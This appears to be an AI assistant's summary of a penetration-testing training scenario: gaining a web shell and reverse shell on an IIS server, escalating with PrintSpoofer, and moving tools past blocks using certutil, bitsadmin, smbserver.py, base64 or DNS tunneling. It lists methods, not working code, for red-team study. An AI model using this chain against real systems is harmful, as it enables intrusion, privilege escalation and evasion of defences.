# File Transfers This scenario is a perfect example of how important it is for penetration testers and red teamers to understand **multiple file transfer methods**, and more importantly, how to **adapt** when common techniques are blocked. Here’s a breakdown and summary of key lessons and techniques highlighted in your scenario: *** #### ⚙️ **Scenario Summary: File Transfer Challenges in a Hardened Environment** **Initial Access:** * Gained **Remote Code Execution (RCE)** on an IIS web server via **unrestricted file upload**. * Uploaded a **web shell** to get a **reverse shell** for further enumeration. **Privilege Escalation Attempt:** * Attempted to use **PowerUp.ps1** via **PowerShell** ➡️ **Blocked** by **App Control Policy**. * Discovered **SeImpersonatePrivilege** manually. * Chose **PrintSpoofer** binary to escalate privileges. **File Transfer Hurdles:** | Method Attempted | Result | Reason for Failure | | -------------------------------------- | --------- | ----------------------------- | | **PowerShell** | ❌ Blocked | App Control Policy | | **Certutil from GitHub** | ❌ Blocked | Web content filtering | | **FTP (port 21)** | ❌ Blocked | Firewall blocked outbound FTP | | **SMB (TCP 445) using `smbserver.py`** | ✅ Success | SMB allowed outbound | *** #### 🧠 **Key Takeaways** 1. **Adaptability Is Critical:** * You must pivot quickly to alternative transfer methods when blocked. 2. **Common File Transfer Methods (Windows):** | Method | Protocol/Tool | Notes | | ---------------------------------------------------- | ---------------- | ------------------------------------------------ | | `PowerShell Invoke-WebRequest` / `Invoke-Expression` | HTTP | Powerful but often monitored | | `Certutil` | HTTP | Common fallback, but may be disabled or filtered | | `bitsadmin` | HTTP | Deprecated, but can be useful | | Windows FTP Client | FTP | Needs port 21 open | | `smbserver.py` (Impacket) | SMB | ✅ Often succeeds if port 445 is open | | Encoding (Base64 / Hex) | Clipboard / Echo | Good in restricted shells | | DNS Tunneling | DNS | Rare but stealthy | | Wget / Curl (Linux) | HTTP/HTTPS | May be blocked by firewall or proxy | | Email / Cloud Upload | SMTP/HTTPS | Often blocked by DLP solutions | 3. **Network Awareness:** * Firewalls, proxies, IDS/IPS, and web filters can all block or alert on your transfer attempts. * Outbound restrictions are common; **inbound traffic (SMB pull)** may work better. 4. **Tools to Know:** * [`smbserver.py`](https://github.com/SecureAuthCorp/impacket) (Impacket) – set up quick SMB shares * [`SimpleHTTPServer`](https://docs.python.org/3/library/http.server.html) (Python) – easy local file hosting * `ncat`, `scp`, `curl`, `wget`, `socat` – all offer unique file transfer opportunities *** #### 📌 **Practical Tip: Use a File Transfer Checklist** Whenever you're stuck on a target: 1. Can I use PowerShell? 2. Is `certutil` available? 3. Are outbound ports like 80, 443, or 445 open? 4. Can I set up an SMB share with `smbserver.py`? 5. Can I encode a small binary as Base64 and reconstruct it? 6. Are there any mapped drives or local tools I can abuse? *** #### 🎯 **Final Thoughts** * **File transfer is a foundational red team skill.** This module trains you to think like an attacker in a **constrained environment**. * Always have **multiple options ready**. * Think like a **defender** too: if you were defending this system, how would you stop these transfers? Would you like a **cheat sheet of file transfer methods** for restricted environments or an **interactive exercise plan** based on this scenario?